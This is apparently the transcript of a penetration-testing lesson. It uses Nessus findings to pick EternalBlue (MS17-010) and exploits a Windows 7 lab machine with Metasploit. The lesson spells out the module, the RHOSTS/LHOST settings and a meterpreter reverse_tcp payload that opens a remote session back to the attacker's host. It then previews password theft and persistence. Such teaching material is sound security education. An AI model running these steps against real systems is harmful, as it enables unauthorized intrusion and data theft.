Exploiting a remote RCE
Let's see now how to exploit all the information provided by Nmap and Nessus to penetrate our target system.
Here are the results from Nmap, but we can clearly see that Nessus does a much better job of presenting the vulnerabilities in a structured way.
We see that there are three critical vulnerabilities and four high-level (High) vulnerabilities.
The first step, as a pentester, consists of searching for vulnerabilities associated with the versions of the detected services.
For example, if you find a specific version of a service, you can search for it on the Exploit Database (Exploit-DB) website.
This is a public database that lists almost all known public exploits, classified by date.
If you search for "FTP" there, for example, you will get the list of all available exploit codes for the different versions of FTP servers.
However, be extremely careful during the exploitation phase, especially with RCE (Remote Code Execution) type vulnerabilities, because their execution can sometimes crash or restart the target server (which can cause a denial of service).
It is therefore essential to do thorough research on the web and forums to know if the exploit you plan to use is stable.
By consulting the Nessus report, we find that among the critical vulnerabilities is the Microsoft RDP RCE flaw discovered in 2019, also known as BlueKeep.
There is also an alert about an unsupported Windows operating system, as well as the MS11-030 flaw in DNS resolution which can allow remote code execution.
These are the first three critical vulnerabilities.
Lower down, in the high-level vulnerabilities, we note the MS17-010 flaw.
This is a very famous vulnerability called EternalBlue, which was notably exploited by the WannaCry ransomware in 2017.
There are also alerts concerning the SSL/TLS configuration (obsolete versions), as well as the MS12-020 vulnerability which can also lead to remote code execution.
To conduct our attack, we must choose a vulnerability.
Ideally, we prioritize the one that offers the best compromise between chances of success, stability for the target system, and the level of privileges obtained.
For this demonstration, we are going to choose the MS17-010 (EternalBlue) flaw.
As a pentester, you can perform research on each of these flaws.
You just have to copy the reference of the vulnerability and search for it on Exploit Database or on Google to understand how it works, its mechzackm, and the associated risks.
To exploit this flaw, we will use the Metasploit framework.
Metasploit is an essential tool for penetration testing, which allows managing the reconnaissance, exploitation, and post-exploitation phases.
It is a true companion for the pentester.
If you want to deepen your knowledge of this tool, I have designed a complete course on Metasploit available on my site `cours.hackinggeek.com`.
To start, let's open a terminal and launch Metasploit with the command `msfconsole`.
Once the console is loaded, we will search for the exploit module for EternalBlue by typing the command `search eternalblue`.
Metasploit returns several modules.
We will select the first exploit for Windows, which corresponds to the MS17-010 vulnerability, by typing `use exploit/windows/smb/ms17_010_eternalblue` (or the module number).
We then type `show options` to visualize the parameters required by the module.
We must configure the target's IP address.
To do this, we use the command `set RHOSTS` followed by the IP address of our victim server.
The default port is the SMB port 445.
We verify the IP address of our Kali Linux attack machine (which is for example `.82`), then we configure the local listening address with the command `set LHOST` followed by this IP.
We leave the local listening port (`LPORT`) on its default value, `4444`.
The payload configured by default is `windows/x64/meterpreter/reverse_tcp`.
Meterpreter is one of the most powerful and widely used payloads in the Metasploit framework, because it offers a lot of features for exploitation and post-exploitation.
By typing `show options` again, we can verify that our entire configuration is correct: the target's IP address (`RHOSTS`), the port, the payload, and the address of our control machine (`LHOST`).
Once the exploit is configured, the principle is simple: Metasploit will exploit the vulnerability on the target server to inject and execute our payload there.
This payload will then initiate a reverse connection to the IP address of our Kali Linux on port 4444.
To launch the attack, we execute the command `exploit` (or `run`).
From experience, know that the exploitation of EternalBlue can sometimes fail on the first attempt.
Be careful because, if the exploit fails brutally, it can cause a blue screen of death (BSOD) on the Windows machine and make it restart, which poses a problem in production.
You must be patient and use stable exploits.
Here, we see the line "Sending stage", which indicates that the payload was successfully transmitted.
The exploitation succeeded and we obtain an active Meterpreter session.
We are now remotely connected to the victim machine.
If I launch the command `sysinfo`, the system confirms to me that it is indeed a Windows 7 machine whose host name is "John-PC".
This is exactly the server that we had identified during our scanning phase.
We analyzed the vulnerabilities detected by Nessus, selected the most appropriate flaw, and obtained remote access via Metasploit.
Now that we are on the server, we can interact with the system, navigate through the directories, or retrieve information.
The exploitation phase is finished.
The actions we will conduct from now on enter the post-exploitation phase.
That is to say, we are going to perform manipulations to escalate our privileges, collect sensitive data (such as passwords), and set up a persistent access on the target machine.
This is what we will study in the next lessons.